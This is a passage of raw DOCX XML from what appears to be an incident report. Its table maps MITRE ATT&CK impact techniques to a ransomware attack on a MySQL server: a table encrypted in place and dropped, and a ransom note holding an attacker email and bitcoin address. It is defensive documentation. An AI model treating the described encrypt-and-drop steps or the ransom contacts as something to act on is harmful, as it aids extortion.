              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6E14139F">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="16BE5F9C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1486 / T1485</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="08E74E6E">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Encrypted for Impact / Data Destruction</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="62B43F48">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">config_info table encrypted in place with MySQL AES_ENCRYPT (1,342 rows), then both config_info and history dropped. Syslog, ff-db-01 mysqld query log, 19:36:30–19:36:38.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="45F63C55">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="153CD0D5">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1486</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2DA2E8E8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Encrypted for Impact</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1F9E9674">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM table created and populated with the payment demand (contact e78393397@proton.me, BTC 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy). Syslog, 19:36:39–19:36:44.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06352E11">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="108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06"/>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07"/>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08"/>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09"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="154">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="148"/>
    <w:link w:val="710"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="155">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="148"/>
    <w:link w:val="711"/>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5"/>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05">
    <w:name w:val="Title"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="706">
    <w:name w:val="Heading 1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2e74b5"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="707">
    <w:name w:val="Heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2e74b5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="708">
    <w:name w:val="Heading 3"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1f4d78"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="709">
    <w:name w:val="Heading 4"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="710">
    <w:name w:val="Heading 5"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="711">
    <w:name w:val="Heading 6"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1f4d78"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="712">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="713">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="714">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0563c1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="715">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="716">
    <w:name w:val="footnote text"/>
    <w:link w:val="717"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="717">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="716"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="718">
    <w:name w:val="endnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="719">
    <w:name w:val="endnote text"/>
    <w:link w:val="720"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="720">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="719"/>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ONLYOFFICE/9.2.1.43</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2026-09-14T20:09:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-14T22:41:18Z</dcterms:modified>
</cp:coreProperties>
</file>